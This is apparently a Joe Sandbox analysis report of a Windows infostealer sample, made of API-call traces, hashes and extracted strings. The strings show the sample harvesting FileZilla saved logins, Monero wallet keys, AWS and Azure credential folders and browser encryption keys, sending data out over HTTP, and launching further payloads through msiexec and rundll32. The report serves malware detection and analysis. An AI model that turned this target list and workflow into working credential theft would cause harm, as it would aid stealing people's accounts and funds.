                          • Opcode ID: 0b283c805b3730483b40197c8ad6822fe954f88a35a9f6a50de31eef20ca3010
                          • Instruction ID: eb74e4f1194d18ac9f3ee869d42ba333065470baf980725b21caf317ad52fd61
                          • Opcode Fuzzy Hash: 0b283c805b3730483b40197c8ad6822fe954f88a35a9f6a50de31eef20ca3010
                          • Instruction Fuzzy Hash: E931F2B3F082204BF3649A6DDC8072A73D6DBD4720F1A853D9F84EB788D8391D054295
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 430383d8499a10e7ceff7574e554e0a439d9d3b1e1217dbdfc4a74cbebf95b87
                          • Instruction ID: 4cbd81a009c20483c92d9538e4b58d20bb86c1b363a2d96890d968145174b541
                          • Opcode Fuzzy Hash: 430383d8499a10e7ceff7574e554e0a439d9d3b1e1217dbdfc4a74cbebf95b87
                          • Instruction Fuzzy Hash: E73177B241C304AFD3057E18EC8167AFBE8EF55360F06092DEAC583610E775A850C787
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f8cd9731a9c16e791024a0034f7aa8d0ba9df52d11588fb9316729df6825afa2
                          • Instruction ID: a60c008cda323085de91a840aadb082cd97da84f2a50585f89c2702d7219d882
                          • Opcode Fuzzy Hash: f8cd9731a9c16e791024a0034f7aa8d0ba9df52d11588fb9316729df6825afa2
                          • Instruction Fuzzy Hash: 9C21A2B35082048BE7497E39DC2533AB7E5FFA5710F1A493DC6C683780EA396955CB06
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                          • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                          APIs
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                            • Part of subcall function 00CC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00CC8E0B
                            • Part of subcall function 00CCA920: lstrcpy.KERNEL32(00000000,?), ref: 00CCA972
                            • Part of subcall function 00CCA920: lstrcat.KERNEL32(00000000), ref: 00CCA982
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                            • Part of subcall function 00CCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CCA7E6
                            • Part of subcall function 00CB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CB99EC
                            • Part of subcall function 00CB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00CB9A11
                            • Part of subcall function 00CB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00CB9A31
                            • Part of subcall function 00CB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00CB148F,00000000), ref: 00CB9A5A
                            • Part of subcall function 00CB99C0: LocalFree.KERNEL32(00CB148F), ref: 00CB9A90
                            • Part of subcall function 00CB99C0: CloseHandle.KERNEL32(000000FF), ref: 00CB9A9A
                            • Part of subcall function 00CC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00CC8E52
                          • GetProcessHeap.KERNEL32(00000000,000F423F,00CD0DBA,00CD0DB7,00CD0DB6,00CD0DB3), ref: 00CC0362
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CC0369
                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 00CC0385
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CD0DB2), ref: 00CC0393
                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 00CC03CF
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CD0DB2), ref: 00CC03DD
                          • StrStrA.SHLWAPI(00000000,<User>), ref: 00CC0419
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CD0DB2), ref: 00CC0427
                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00CC0463
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CD0DB2), ref: 00CC0475
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CD0DB2), ref: 00CC0502
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CD0DB2), ref: 00CC051A
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CD0DB2), ref: 00CC0532
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CD0DB2), ref: 00CC054A
                          • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00CC0562
                          • lstrcat.KERNEL32(?,profile: null), ref: 00CC0571
                          • lstrcat.KERNEL32(?,url: ), ref: 00CC0580
                          • lstrcat.KERNEL32(?,00000000), ref: 00CC0593
                          • lstrcat.KERNEL32(?,00CD1678), ref: 00CC05A2
                          • lstrcat.KERNEL32(?,00000000), ref: 00CC05B5
                          • lstrcat.KERNEL32(?,00CD167C), ref: 00CC05C4
                          • lstrcat.KERNEL32(?,login: ), ref: 00CC05D3
                          • lstrcat.KERNEL32(?,00000000), ref: 00CC05E6
                          • lstrcat.KERNEL32(?,00CD1688), ref: 00CC05F5
                          • lstrcat.KERNEL32(?,password: ), ref: 00CC0604
                          • lstrcat.KERNEL32(?,00000000), ref: 00CC0617
                          • lstrcat.KERNEL32(?,00CD1698), ref: 00CC0626
                          • lstrcat.KERNEL32(?,00CD169C), ref: 00CC0635
                          • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CD0DB2), ref: 00CC068E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Similarity
                          • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 1942843190-555421843
                          • Opcode ID: 22a7f04dd034935b3eb6051d917e1abbcec97fa02b82f8e712f4a12adca8630c
                          • Instruction ID: 62faef95e2c7c611bc934f14bf27a2c350f84a59386a239f054905dbe0e50e20
                          • Opcode Fuzzy Hash: 22a7f04dd034935b3eb6051d917e1abbcec97fa02b82f8e712f4a12adca8630c
                          • Instruction Fuzzy Hash: 3BD11BB1900208ABCB04EBE5DD9AFFE7338EF54304F54452DF506B6191DE74AA0ADB62
                          APIs
                            • Part of subcall function 00CCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CCA7E6
                            • Part of subcall function 00CB47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00CB4839
                            • Part of subcall function 00CB47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00CB4849
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00CB59F8
                          • StrCmpCA.SHLWAPI(?,0189E6F8), ref: 00CB5A13
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00CB5B93
                          • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0189E6D8,00000000,?,01898D88,00000000,?,00CD1A1C), ref: 00CB5E71
                          • lstrlen.KERNEL32(00000000), ref: 00CB5E82
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00CB5E93
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CB5E9A
                          • lstrlen.KERNEL32(00000000), ref: 00CB5EAF
                          • lstrlen.KERNEL32(00000000), ref: 00CB5ED8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00CB5EF1
                          • lstrlen.KERNEL32(00000000,?,?), ref: 00CB5F1B
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00CB5F2F
                          • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00CB5F4C
                          • InternetCloseHandle.WININET(00000000), ref: 00CB5FB0
                          • InternetCloseHandle.WININET(00000000), ref: 00CB5FBD
                          • HttpOpenRequestA.WININET(00000000,0189E668,?,0189DEC8,00000000,00000000,00400100,00000000), ref: 00CB5BF8
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                            • Part of subcall function 00CCA920: lstrcpy.KERNEL32(00000000,?), ref: 00CCA972
                            • Part of subcall function 00CCA920: lstrcat.KERNEL32(00000000), ref: 00CCA982
                          • InternetCloseHandle.WININET(00000000), ref: 00CB5FC7
                          Similarity
                          • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 874700897-2180234286
                          • Opcode ID: bba90e4ad82ae0592fef104996202fafbe32753583ff6862744fa89c132a34f6
                          • Instruction ID: 1e49416078a8adeaa80d44c68c5e0a517421c1748be373bb3f7576c039476822
                          • Opcode Fuzzy Hash: bba90e4ad82ae0592fef104996202fafbe32753583ff6862744fa89c132a34f6
                          • Instruction Fuzzy Hash: 8B12F77182011CABDB15EBA1DC9AFEEB378BF54704F5041ADF10A62091EF702A4ADF65
                          APIs
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                            • Part of subcall function 00CC8B60: GetSystemTime.KERNEL32(00CD0E1A,018992C8,00CD05AE,?,?,00CB13F9,?,0000001A,00CD0E1A,00000000,?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CC8B86
                            • Part of subcall function 00CCA920: lstrcpy.KERNEL32(00000000,?), ref: 00CCA972
                            • Part of subcall function 00CCA920: lstrcat.KERNEL32(00000000), ref: 00CCA982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00CBCF83
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00CBD0C7
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CBD0CE
                          • lstrcat.KERNEL32(?,00000000), ref: 00CBD208
                          • lstrcat.KERNEL32(?,00CD1478), ref: 00CBD217
                          • lstrcat.KERNEL32(?,00000000), ref: 00CBD22A
                          • lstrcat.KERNEL32(?,00CD147C), ref: 00CBD239
                          • lstrcat.KERNEL32(?,00000000), ref: 00CBD24C
                          • lstrcat.KERNEL32(?,00CD1480), ref: 00CBD25B
                          • lstrcat.KERNEL32(?,00000000), ref: 00CBD26E
                          • lstrcat.KERNEL32(?,00CD1484), ref: 00CBD27D
                          • lstrcat.KERNEL32(?,00000000), ref: 00CBD290
                          • lstrcat.KERNEL32(?,00CD1488), ref: 00CBD29F
                          • lstrcat.KERNEL32(?,00000000), ref: 00CBD2B2
                          • lstrcat.KERNEL32(?,00CD148C), ref: 00CBD2C1
                          • lstrcat.KERNEL32(?,00000000), ref: 00CBD2D4
                          • lstrcat.KERNEL32(?,00CD1490), ref: 00CBD2E3
                            • Part of subcall function 00CCA820: lstrlen.KERNEL32(00CB4F05,?,?,00CB4F05,00CD0DDE), ref: 00CCA82B
                            • Part of subcall function 00CCA820: lstrcpy.KERNEL32(00CD0DDE,00000000), ref: 00CCA885
                          • lstrlen.KERNEL32(?), ref: 00CBD32A
                          • lstrlen.KERNEL32(?), ref: 00CBD339
                            • Part of subcall function 00CCAA70: StrCmpCA.SHLWAPI(01899AD0,00CBA7A7,?,00CBA7A7,01899AD0), ref: 00CCAA8F
                          • DeleteFileA.KERNEL32(00000000), ref: 00CBD3B4
                          Similarity
                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                          • String ID:
                          • API String ID: 1956182324-0
                          • Opcode ID: 380d4f033c9968c4ab9fa7206563a44e9e1f98e72ff5511992e0ea181978caf5
                          • Instruction ID: fd24745d161fe6e533759a7df0e47aabff62c0f98f82b387e6d46804a7a3830a
                          • Opcode Fuzzy Hash: 380d4f033c9968c4ab9fa7206563a44e9e1f98e72ff5511992e0ea181978caf5
                          • Instruction Fuzzy Hash: 9CE13EB1910108AFCB04EBA1DD9AFEE7378BF54304F544169F507B6091DE35AE0AEB62
                          APIs
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                            • Part of subcall function 00CCA920: lstrcpy.KERNEL32(00000000,?), ref: 00CCA972
                            • Part of subcall function 00CCA920: lstrcat.KERNEL32(00000000), ref: 00CCA982
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0189CDC8,00000000,?,00CD144C,00000000,?,?), ref: 00CBCA6C
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00CBCA89
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00CBCA95
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CBCAA8
                          • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00CBCAD9
                          • StrStrA.SHLWAPI(?,0189CE40,00CD0B52), ref: 00CBCAF7
                          • StrStrA.SHLWAPI(00000000,0189CEB8), ref: 00CBCB1E
                          • StrStrA.SHLWAPI(?,0189D568,00000000,?,00CD1458,00000000,?,00000000,00000000,?,01899A30,00000000,?,00CD1454,00000000,?), ref: 00CBCCA2
                          • StrStrA.SHLWAPI(00000000,0189D5A8), ref: 00CBCCB9
                            • Part of subcall function 00CBC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00CBC871
                            • Part of subcall function 00CBC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00CBC87C
                          • StrStrA.SHLWAPI(?,0189D5A8,00000000,?,00CD145C,00000000,?,00000000,01899AB0), ref: 00CBCD5A
                          • StrStrA.SHLWAPI(00000000,01899CB0), ref: 00CBCD71
                            • Part of subcall function 00CBC820: lstrcat.KERNEL32(?,00CD0B46), ref: 00CBC943
                            • Part of subcall function 00CBC820: lstrcat.KERNEL32(?,00CD0B47), ref: 00CBC957
                            • Part of subcall function 00CBC820: lstrcat.KERNEL32(?,00CD0B4E), ref: 00CBC978
                          • lstrlen.KERNEL32(00000000), ref: 00CBCE44
                          • CloseHandle.KERNEL32(00000000), ref: 00CBCE9C
                          Similarity
                          • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                          • String ID:
                          • API String ID: 3744635739-3916222277
                          • Opcode ID: dfae444034f07f3cd48e2a326fd6dc4c403c012a1306d7189a74729617e0b9a4
                          • Instruction ID: 1909fc0f834a35bf3588ff4bff5bfaff0ed2bc490a3f960da42c7590e7bff8b4
                          • Opcode Fuzzy Hash: dfae444034f07f3cd48e2a326fd6dc4c403c012a1306d7189a74729617e0b9a4
                          • Instruction Fuzzy Hash: DFE119B191010CAFDB14EBA1DC9AFEEB778AF54304F44416DF106B6191EF306A4ADB62
                          APIs
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                          • RegOpenKeyExA.ADVAPI32(00000000,0189B590,00000000,00020019,00000000,00CD05B6), ref: 00CC83A4
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00CC8426
                          • wsprintfA.USER32 ref: 00CC8459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00CC847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 00CC848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00CC8499
                            • Part of subcall function 00CCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CCA7E6
                          Similarity
                          • API ID: CloseOpenlstrcpy$Enumwsprintf
                          • String ID: - $%s\%s$?
                          • API String ID: 3246050789-3278919252
                          • Opcode ID: bb80917c2e4094722c9831b21faa12915e936f7c395457fd41a142ac7f9f9c16
                          • Instruction ID: f08848759e2d949eaedf4d9b084f7ddad3310103ad6de41c080a89766920b634
                          • Opcode Fuzzy Hash: bb80917c2e4094722c9831b21faa12915e936f7c395457fd41a142ac7f9f9c16
                          • Instruction Fuzzy Hash: 9E81EBB191011CAFDB28DB55CC95FEAB7B8BF48704F008299E109A6190DF716F89CF95
                          APIs
                            • Part of subcall function 00CC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00CC8E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00CC4DB0
                          • lstrcat.KERNEL32(?,\.azure\), ref: 00CC4DCD
                            • Part of subcall function 00CC4910: wsprintfA.USER32 ref: 00CC492C
                            • Part of subcall function 00CC4910: FindFirstFileA.KERNEL32(?,?), ref: 00CC4943
                          • lstrcat.KERNEL32(?,00000000), ref: 00CC4E3C
                          • lstrcat.KERNEL32(?,\.aws\), ref: 00CC4E59
                            • Part of subcall function 00CC4910: StrCmpCA.SHLWAPI(?,00CD0FDC), ref: 00CC4971
                            • Part of subcall function 00CC4910: StrCmpCA.SHLWAPI(?,00CD0FE0), ref: 00CC4987
                            • Part of subcall function 00CC4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00CC4B7D
                            • Part of subcall function 00CC4910: FindClose.KERNEL32(000000FF), ref: 00CC4B92
                          • lstrcat.KERNEL32(?,00000000), ref: 00CC4EC8
                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00CC4EE5
                            • Part of subcall function 00CC4910: wsprintfA.USER32 ref: 00CC49B0
                            • Part of subcall function 00CC4910: StrCmpCA.SHLWAPI(?,00CD08D2), ref: 00CC49C5
                            • Part of subcall function 00CC4910: wsprintfA.USER32 ref: 00CC49E2
                            • Part of subcall function 00CC4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00CC4A1E
                            • Part of subcall function 00CC4910: lstrcat.KERNEL32(?,0189E5E8), ref: 00CC4A4A
                            • Part of subcall function 00CC4910: lstrcat.KERNEL32(?,00CD0FF8), ref: 00CC4A5C
                            • Part of subcall function 00CC4910: lstrcat.KERNEL32(?,?), ref: 00CC4A70
                            • Part of subcall function 00CC4910: lstrcat.KERNEL32(?,00CD0FFC), ref: 00CC4A82
                            • Part of subcall function 00CC4910: lstrcat.KERNEL32(?,?), ref: 00CC4A96
                            • Part of subcall function 00CC4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00CC4AAC
                            • Part of subcall function 00CC4910: DeleteFileA.KERNEL32(?), ref: 00CC4B31
                          Similarity
                          • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                          • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                          • API String ID: 949356159-974132213
                          • Opcode ID: adb69cef23af67664247b4f99b739accf671c3d2487b9cb802503e771e2a1835
                          • Instruction ID: d8f0b6b464dc8e2ea60ce359690e7f709f8c6bc7670b9a91423852f445e71fc1
                          • Opcode Fuzzy Hash: adb69cef23af67664247b4f99b739accf671c3d2487b9cb802503e771e2a1835
                          • Instruction Fuzzy Hash: 7041A5B99402086BD714F760EC57FED3338AB64704F4444A8B649A61C1EEF46BCDDB92
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00CC906C
                          Similarity
                          • API ID: CreateGlobalStream
                          • String ID: image/jpeg
                          • API String ID: 2244384528-3785015651
                          • Opcode ID: 6cfeb65b971d11f8a76d7e0fddd8239f70c1ad753e2d96f3e469f5e79ceebc88
                          • Instruction ID: ff851e901c1916ec269341fbde9ac8ed507dbf722e01a4c3c8e9e4c67dd15b05
                          • Opcode Fuzzy Hash: 6cfeb65b971d11f8a76d7e0fddd8239f70c1ad753e2d96f3e469f5e79ceebc88
                          • Instruction Fuzzy Hash: F371EEB1910208AFDB14EFE5DC89FEEB7B8FB88700F148518F515AB290DB74A905DB61
                          APIs
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00CC31C5
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00CC335D
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00CC34EA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExecuteShell$lstrcpy
                          • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                          • API String ID: 2507796910-3625054190
                          • Opcode ID: f34c82891b2d8865c3ace4ae194a5de3eb52b867578e220e5cfcf19f4f10d0d8
                          • Instruction ID: e2d9642f3c621a3b96380c84853b2f02de283b807d46f09b47f7c1a5818936be
                          • Opcode Fuzzy Hash: f34c82891b2d8865c3ace4ae194a5de3eb52b867578e220e5cfcf19f4f10d0d8
                          • Instruction Fuzzy Hash: 0612F97181010C9BDB19EBA0DC9AFEEB738AF14304F50416DF50666191EF342B8ADFA6
                          APIs
                            • Part of subcall function 00CCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CCA7E6
                            • Part of subcall function 00CB6280: InternetOpenA.WININET(00CD0DFE,00000001,00000000,00000000,00000000), ref: 00CB62E1
                            • Part of subcall function 00CB6280: StrCmpCA.SHLWAPI(?,0189E6F8), ref: 00CB6303
                            • Part of subcall function 00CB6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00CB6335
                            • Part of subcall function 00CB6280: HttpOpenRequestA.WININET(00000000,GET,?,0189DEC8,00000000,00000000,00400100,00000000), ref: 00CB6385
                            • Part of subcall function 00CB6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00CB63BF
                            • Part of subcall function 00CB6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CB63D1
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00CC5318
                          • lstrlen.KERNEL32(00000000), ref: 00CC532F
                            • Part of subcall function 00CC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00CC8E52
                          • StrStrA.SHLWAPI(00000000,00000000), ref: 00CC5364
                          • lstrlen.KERNEL32(00000000), ref: 00CC5383
                          • lstrlen.KERNEL32(00000000), ref: 00CC53AE
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 3240024479-1526165396
                          • Opcode ID: 4b57e3367109e2c8c0a9216fb0d1a0f4f9695438a338dc0dee293d141207b949
                          • Instruction ID: cecceb7f92b5e54ee3e9bcf7baec06f25593d04afef7f74c149420713abacda6
                          • Opcode Fuzzy Hash: 4b57e3367109e2c8c0a9216fb0d1a0f4f9695438a338dc0dee293d141207b949
                          • Instruction Fuzzy Hash: 6551FC7091014C9FDB18FF61C99AFED7779AF50304F50402CE90A6A592DF346B4AEB62
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: bd24e6352a69d569c8779adaaca367c843eb88ea0b53c6e08043872f0db57a0a
                          • Instruction ID: 0ed35a2b71e8d04784fc2e52af5741ea2d46990a806bed0346f3f40091522ba0
                          • Opcode Fuzzy Hash: bd24e6352a69d569c8779adaaca367c843eb88ea0b53c6e08043872f0db57a0a
                          • Instruction Fuzzy Hash: 79C195B590011D9BCB14EF61DC89FEA7378BB94304F1445ACF50AA7182DA70EA89DF91
                          APIs
                            • Part of subcall function 00CC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00CC8E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00CC42EC
                          • lstrcat.KERNEL32(?,0189E390), ref: 00CC430B
                          • lstrcat.KERNEL32(?,?), ref: 00CC431F
                          • lstrcat.KERNEL32(?,0189CF90), ref: 00CC4333
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                            • Part of subcall function 00CC8D90: GetFileAttributesA.KERNEL32(00000000,?,00CB1B54,?,?,00CD564C,?,?,00CD0E1F), ref: 00CC8D9F
                            • Part of subcall function 00CB9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00CB9D39
